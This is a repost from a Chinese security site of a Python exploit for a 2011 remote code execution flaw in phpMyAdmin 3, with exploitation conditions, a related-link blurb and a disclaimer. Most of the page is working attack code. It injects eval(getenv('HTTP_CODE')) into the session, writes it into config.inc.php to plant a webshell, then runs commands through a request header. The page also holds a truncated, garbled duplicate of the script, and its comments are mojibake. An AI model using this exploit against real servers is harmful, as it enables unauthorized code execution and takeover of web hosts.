#!/usr/bin/env python # coding=utf-8 # pma3 - phpMyAdmin3 remote code execute exploit # Author: wofeiwo" % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0) def main(args): try: if len(args) (.*) >>", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print e if __name__ == "__main__" : main(sys.argv) # [2011-07-08]
----------------------------------------------------------
Tested on: 3.1.1, 3.2.1, 3.4.3
利用条件:
1. "config" 文件必须可写(或者可创建)
2. 在PHP.ini中要session.auto_start = 1
鸡肋点:
PHP.ini中session.auto_start默认是0
|
python EXP: import os,sys,urllib2,re def usage(program): print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit" print "Usage: %s " % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0) def main(args): try: if len(args) < 2: usage(args[0]) if args[1][-1] == "/": args[1] = args[1][:-1] # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ� print "[+] Trying get form token&session_id.." content = urllib2.urlopen(args[1]+"/index.php").read() r1 = re.findall("token=(w{32})", content) r2 = re.findall("phpMyAdmin=(w{32,40})", content) if not r1: r1 = re.findall("token" value="(w{32})"", content) if not r2: r2 = re.findall("phpMyAdmin" value="(w{32,40})"", content) if len(r1) < 1 or len(r2) < 1: print "[-] Cannot find form token and session id...exit." sys.exit(-1) token = r1[0] sessionid = r2[0] print "[+] Token: %s , SessionID: %s" % (token, sessionid) # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ print "[+] Trying to insert payload in $_SESSION.." uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" url = args[1]+uri opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid))) urllib2.install_opener(opener) urllib2.urlopen(url) # ����setup��ȡshell print "[+] Trying get webshell.." postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token) url = args[1]+"/setup/config.php" # print "[+]Postdata: %s" % postdata urllib2.urlopen(url, postdata) print "[+] All done, pray for your lucky!" # ���IJ����������shell url = args[1]+"/config/config.inc.php" opener.addheaders.append(('Code', 'phpinfo();')) urllib2.install_opener(opener) print "[+] Trying connect shell: %s" % url result = re.findall("System (.*)", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print e if __name__ == "__main__" : main(sys.argv) |
文章来源于lcx.cc:phpMyAdmin3 远程代码执行漏洞 + 利用
相关推荐: Baidu Related Searches Crawler (百度相关搜索抓取工具) v1.0
Name : Baidu Related Searches Crawler (百度相关搜索抓取工具) Version: 1.0 Author : Nuclear'Atk, url: https://lcx.cc/ Command: word : [必选] 指定…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论